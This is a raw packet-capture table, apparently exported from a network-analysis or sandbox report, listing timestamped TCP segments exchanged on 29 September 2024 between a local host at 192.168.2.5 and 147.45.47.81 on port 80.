                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415380001 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415424109 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415456057 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415503025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415548086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415551901 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415594101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415636063 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415638924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415685892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415730953 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415733099 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415777922 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415817976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415831089 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415864944 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415910006 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415924072 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.415961027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416006088 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416009903 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416066885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416111946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416111946 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416157961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416199923 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416203022 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416249037 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416295052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416297913 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416340113 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416385889 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416387081 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416431904 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416476965 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416481018 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416522980 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416568995 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416568995 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416614056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416656017 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416661024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416707993 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416754961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416755915 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416812897 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.416862965 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485061884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485127926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485173941 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485198975 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485220909 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485266924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485272884 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485312939 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485358953 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485358953 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485420942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.485459089 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.497778893 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.497823000 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.497886896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.497888088 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.497951984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498003960 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498012066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498059988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498104095 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498106956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498166084 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498210907 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498210907 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498258114 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498306036 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498320103 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498366117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498410940 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498440027 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498455048 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498517036 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498517036 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498581886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498622894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498626947 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498684883 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498729944 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498732090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498778105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498831034 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498838902 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498884916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498930931 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498934031 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.498975039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499020100 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499036074 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499098063 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499141932 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499146938 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499186993 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499231100 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499238014 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499278069 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499322891 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499326944 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499368906 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499414921 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499470949 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499516010 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499558926 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499561071 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499607086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499649048 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499651909 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499700069 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499743938 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499762058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499809027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499850988 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499869108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499916077 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499959946 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.499962091 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500008106 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500050068 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500068903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500129938 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500175953 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500174999 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500224113 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500266075 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500268936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500314951 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500358105 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500360966 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500408888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500454903 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500458002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500504017 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500545025 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500547886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500593901 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500637054 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500639915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500684977 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500725985 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500730038 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500776052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500817060 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500819921 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500866890 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500910997 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500911951 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500957966 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.500998974 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501000881 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501049042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501089096 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501094103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501138926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501178980 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501178980 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501224041 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501267910 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501270056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501316071 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501362085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501363039 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501408100 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501452923 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501454115 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501497984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501535892 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501543045 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501588106 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501630068 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501632929 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501677990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501718998 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501727104 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501773119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501815081 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501817942 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501857996 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501894951 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501900911 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501946926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501991034 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.501991987 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502038956 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502079010 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502084970 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502130032 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502172947 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502180099 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502221107 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502264023 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502264977 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502310991 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502356052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502367973 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502404928 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502449989 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502470016 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502495050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502541065 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502552986 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502587080 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502630949 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502631903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502676964 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502722979 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502741098 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502768993 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502813101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502840996 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502859116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502904892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502907038 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502950907 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.502995014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.503005981 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.503041029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.503086090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.503098965 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.503132105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.503180027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.503190041 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.551475048 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572037935 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572118044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572228909 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572238922 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572289944 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572329044 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572335005 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572381973 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572423935 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572427988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572475910 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.572523117 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.584925890 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585045099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585098028 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585109949 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585172892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585222006 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585235119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585283041 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585325956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585361004 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585407972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585448980 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585469007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585532904 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585573912 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585580111 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585642099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585685968 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585689068 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585736036 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585777044 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585796118 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585844040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585886002 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585890055 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.585949898 CEST8049706147.45.47.81192.168.2.5
